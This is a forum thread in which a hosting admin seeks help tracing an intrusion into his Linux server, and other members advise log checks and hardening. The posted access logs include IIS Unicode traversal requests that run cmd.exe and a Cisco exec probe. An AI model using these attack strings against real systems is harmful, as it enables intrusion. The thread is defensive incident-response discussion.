Results 1 to 17 of 17
  1. #1
    Join Date
    Apr 2004
    Location
    India
    Posts
    292

    I need to find entrypoint of hacker into server !!Security experts can u help me?

    Hello All,
    I have a compromised server ... I have posted query for the same ...
    Now my logwatch says this :
    My xferlogs are saying:
    --------------------- ftpd-xferlog Begin ------------------------

    TOTAL KB IN: 119KB (0MB)

    ---------------------- ftpd-xferlog End --------

    It seems that somebody uploaded something ...very little as 119KB ? Serious looking !!!

    IMAPd] Logout stats:
    ====================
    User | Logouts | Downloaded | Mbox Size
    --------------------------------------- | ------- | ---------- | ----------
    ??? domain=??? | 161 | |
    beth@pachak.com domain=pachak.com | 2 | |
    jlong domain=s3tech.net | 3 | |
    joel domain=swspeed.com | 12 | |
    westerman@aknb.org domain=aknb.org | 3 | |
    ----------------------------------------------------------------------------
    181 | 0 | 0



    **Unmatched Entries**
    Connection timed out, while reading line user=david@devianconsult.com host=pcp03161084pcs.parads01.nm.comca
    st.net [68.35.41.63]: 1 Time(s)
    Connection timed out, while reading line user=david@pachak.com host=pcp03161084pcs.parads01.nm.comcast.net
    [68.35.41.63]: 1 Time(s)
    Logout user=??? domain=??? host=UNKNOWN: 12 Time(s)

    So many dropped packets:
    --------------------- Kernel Begin ------------------------


    Dropped 56 packets on interface eth0
    From 61.110.238.96 - 5 packets to tcp(17300,17300,17300,17300,17300)
    From 64.179.97.193 - 3 packets to tcp(2745)
    From 69.39.92.168 - 3 packets to tcp(2745)
    From 69.91.24.102 - 9 packets to tcp(1025,2745,6129)
    From 69.137.65.77 - 3 packets to tcp(2745)
    From 69.144.221.228 - 6 packets to tcp(1025,2745,6129)
    From 69.167.198.187 - 4 packets to tcp(1025,2745,6129)
    From 213.236.248.149 - 10 packets to tcp(4561,44464,4561,44464,4561,44464,4561,44464,4561,44464)
    From 218.89.104.161 - 3 packets to tcp(5554,5554,9898)
    From 221.143.42.23 - 10 packets to udp(1026,1026,1026,1026,1026)

    Logged 10 packets on interface eth0
    From 61.11.23.142 - 6 packets to tcp(22)
    From 69.240.64.97 - 4 packets to tcp(22)

    ---------------------- Kernel End -------------------------
    pam_unix says:
    Unknown Entries:
    2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.
    nm.comcast.net user=admin: 1 Time(s)

    -------------------------------------------------
    VERY SERIOUS LINE:
    PAM-listfile: Couldn't open /etc/ftpusers
    hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not
    known to the underlying authentication module.
    -----------------------------------------------------

    Now see some entries in access_log :
    root@hosting [~]# cat /usr/local/apache/logs/access_log | grep -i "/../"
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    208.41.103.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:18:14 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:21:11 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:24:04 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -

    Security experts can u help me to find what is entry point?What must have gone wrong?
    What should I do?
    Any suggestion ?
    thelinophile
    Thinking Different !!

  2. #2
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Those are entry points for iis not linux.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  3. #3
    Join Date
    Mar 2003
    Location
    Rio de Janeiro - Brazil
    Posts
    291

    Re: I need to find entrypoint of hacker into server !!Security experts can u help me?

    Originally posted by atul
    Security experts can u help me?
    Sure they can. But you'll get faster answers (and solutions) if you hire one... Talk to thelinuxguy (Steve, from http://www.rack911.com/), he'll be able to help you.

  4. #4
    Join Date
    Mar 2003
    Location
    Rio de Janeiro - Brazil
    Posts
    291
    ops..., he replied first

  5. #5
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    cd /usr/local/apache/domlogs
    grep wget *
    i dont have time to explain it right now but u should be able to figure it out.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  6. #6
    Greetings:

    How do you know your server is compromised?

    The command Steve wrote about will show if the hacker got in via Apache/PHP/Perl CGI, etc. using wget off of your server.

    Properly configured, mod_security from http://www.modsecurity.org/ will protect against such attacks; and another good layer is to disable wget, similar programs, along with your compilers from access by everyone except root.

    You may also want to review /var/log/secure and /var/log/messages.

    Thank you.
    ---
    Peter M. Abraham
    LinkedIn Profile

  7. #7
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hello dynamiscnt,
    Please look at this:

    root@hosting [/var/tmp/ls]# ls
    ./ dynip.sh* iroffer.tar mybot.ignl.bkup mybot.xdcc README x.xdcc
    ../ iroffer* Makefile mybot.log mybot.xdcc.bkup sample.config
    Configure* iroffer_chroot* Makefile.config mybot.log.2004-w28 mybot.xdcc.txt src/
    COPYING iroffer.cron* mybot.ignl mybot.msg obj/ WHATSNEW

    These were presents but i deleted thsese..
    And Mr.Security How can u say that those are entrypoints of IIS and not of Linux..? I have RHE3 on server... and that is server is hacked ...
    How can I check what is the damage?
    thelinophile
    Thinking Different !!

  8. #8
    Greetings:

    The log entries you posted deal with attacks geared against IIS, not Linux. That's probably why Steve pointed out those particular log entries mean zero as it relates to your system and a compromise on your system.

    I take it /tmp was not secured (nosuid, nonexec). Correct?

    Did you check through your Apache access log files searching for "wget" as Steve suggested?

    Thank you.
    ---
    Peter M. Abraham
    LinkedIn Profile

  9. #9
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hello ,
    Did u see my logwatch I posted along with the access_log which u say is IIS attack !!
    NO /tmp is already secured .. I mean before the attack !! and also quotas are enabled on it !!!
    Please can u analyse the logwatch like dropped packets, or this
    2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.
    nm.comcast.net user=admin: 1 Time(s)

    and this VERY SERIOUS
    PAM-listfile: Couldn't open /etc/ftpusers
    hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not
    known to the underlying authentication module.

    I think you haven't seen thses !! I think they are serious may help me to trace the entrypoint !!!
    What do u suggest ??
    thelinophile
    Thinking Different !!

  10. #10
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Atul none of that is related to the attack you were given. IIS is a windows product not a linux product that is why i mentioned that means nothing since you are on linux aka redhat.

    those logwatch entrys are a daily thing. You got to learn to live with them.
    check out: http://rfxnetworks.com/bfd.php

    Those scripts in your /var/tmp are not "harmful" they are bad but they will not compromise the root of the server. They are simply a irc bot used to distrubute files though dcc. Also known as a xdcc bot.

    You entry point was probably a php script which has been mentioned to you many times in many posts but you seem to be ignoring them.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  11. #11
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hello Mr.Security,
    I am very sorry if I said anything abrupt !!!
    I dind't have any idea of those logwatch are safe to believe !!
    Thanks for it !!
    Yes I know U have mentioned that the entry point is php script..
    and I have enabled safe mode in php.ini and also disable functions such as mentioned ...
    So that php is already installed on server !!!What can I do for it?
    Is there any way to find it ?
    This is one more I wanted to show you about suid script
    ) SUID and SGID files found : ( find / \( -perm -004000 -o -perm -002000 \) -type f -print)
    /home/invictus/public_html/postinfo.html
    /home/invictus/public_html/.htaccess
    /home/invictus/public_html/_vti_inf.html
    /home/invictus/public_html/auth.php
    /home/invictus/public_html/backend.php
    /home/invictus/public_html/banners.php
    /home/invictus/public_html/footer.php
    /home/invictus/public_html/header.php
    /home/invictus/public_html/index.php
    /home/invictus/public_html/mainfile.php
    /home/invictus/public_html/modules.php
    /home/invictus/public_html/robots.txt
    /home/invictus/public_html/ultramode.txt
    /home/invictus/public_html/config.~php
    find: /proc/27624/fd/4: No such file or directory
    find: /proc/27624/fd/4: No such file or directory
    /usr/sbin/usernetctl
    /usr/sbin/utempter
    /usr/sbin/exim
    /usr/sbin/suexec
    /usr/sbin/sendmail
    /usr/sbin/gnome-pty-helper
    /usr/bin/chage
    /usr/bin/gpasswd
    /usr/bin/wall
    /usr/bin/passwd
    /usr/bin/at
    /usr/bin/quota
    /usr/bin/crontab
    /usr/bin/lppasswd
    /usr/libexec/openssh/ssh-keysign
    /usr/local/urchin/bin/urchind
    /usr/local/urchin/util/geo-update
    /usr/local/urchin/util/u3importer
    /usr/local/urchin/util/uconf-driver
    /usr/local/urchin/util/uconf-export
    /usr/local/urchin/util/uconf-import
    /usr/local/urchin/util/uconf-schedule
    /usr/local/urchin/util/udb-sanitizer
    /usr/local/apache/bin/suexec
    /usr/local/cpanel/bin/cpwrap
    /usr/local/cpanel/bin/jailshell
    /usr/local/cpanel/3rdparty/mailman/mail/mailman
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/options
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/private
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
    /usr/local/cpanel/cgi-sys/scgiwrap
    /bin/su
    /sbin/pam_timestamp_check
    /sbin/pwdb_chkpwd
    /sbin/unix_chkpwd
    /sbin/netreport

    I had disable wget to 700 already before the attack ..
    Do u see anything flase in those list?
    THank Mr.Security!! I have all faith in you !!
    THanks again!!
    thelinophile
    Thinking Different !!

  12. #12
    Join Date
    Jul 2001
    Location
    Singapore
    Posts
    1,889
    FYI, to check or monitor for s[ug]id files... use sXid which is good
    http://freshmeat.net/projects/sxid/
    Giam Teck Choon
    :: Join choon.net Community today to share your tips and tricks on server issues please ::
    :: Singapore Dedicated Servers :: Singapore Virtual Private Servers :: Linux/FreeBSD Server Management ::

  13. #13
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hello All,
    The sxid logs say this:
    I think according to Mr.Security ,some php script is the problem
    I think it could be one of them :
    #sxid
    /home/invictus/public_html/config.~php^^32039^^32040^^36863^^1618916^^e417e7c1f4d43bd60f4d3fe5e4c3d32d
    /home/invictus/public_html/ultramode.txt^^32039^^32040^^36863^^1618914^^bdbb17421e5d5f4c24b611e86ade522e
    /home/invictus/public_html/robots.txt^^32039^^32040^^36863^^1618913^^089023af5da43c852e4d4d59c0ec3a9e
    /home/invictus/public_html/modules.php^^32039^^32040^^36863^^1618912^^41c871826e334e9470422adf665e1f81
    /home/invictus/public_html/mainfile.php^^32039^^32040^^36863^^1618911^^aefa54854aeb1000e897133a672c3199
    /home/invictus/public_html/index.php^^32039^^32040^^36863^^1618910^^e49bff767016bc21d2dcabfd799b358d
    /home/invictus/public_html/header.php^^32039^^32040^^36863^^1618908^^218bd1bac6599961d5727b9b744ec92d
    /home/invictus/public_html/footer.php^^32039^^32040^^36863^^1618907^^cdf7efd8e351ef1e5bb560d73abbbc0d
    /home/invictus/public_html/banners.php^^32039^^32040^^36863^^1618905^^748fa745809248efd600ca7c313ac6d4
    /home/invictus/public_html/backend.php^^32039^^32040^^36863^^1618904^^b731b8db128bcda3b36a1c0cdbf0fe7d
    /home/invictus/public_html/auth.php^^32039^^32040^^36863^^1618903^^624b56edae07c3f407facee7aaf6eafe
    /home/invictus/public_html/_vti_inf.html^^32039^^32040^^36863^^1618902^^5721e16914007736f8611fdd96ef0723
    /home/invictus/public_html/.htaccess^^32039^^32040^^36863^^1618899^^76eed586c54af24744ed41a3597d0afe
    /home/invictus/public_html/postinfo.html^^32039^^32040^^36863^^1618900^^1ccbd6660460154debbd1c011290722
    thelinophile
    Thinking Different !!

  14. #14
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Thats no problem ^^
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  15. #15
    Join Date
    Apr 2004
    Location
    India
    Posts
    292
    Hello Mr.Security,
    May I know how do u say that? These are the only php suid scripts found to be doubtful !!!
    What is that output mean? Can u please mention in brief?
    Where and how should I look for false .php script? How should I check the damage happened to system?
    Thanks once again!
    thelinophile
    Thinking Different !!

  16. #16
    Greetings:

    Did you check through your Apache access log files searching for "wget" as Steve suggested?

    Thank you.
    ---
    Peter M. Abraham
    LinkedIn Profile

  17. #17
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    If you want help you are going to have to listen to what others have said...the wget thing is a very common entry method and the first thing to check.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •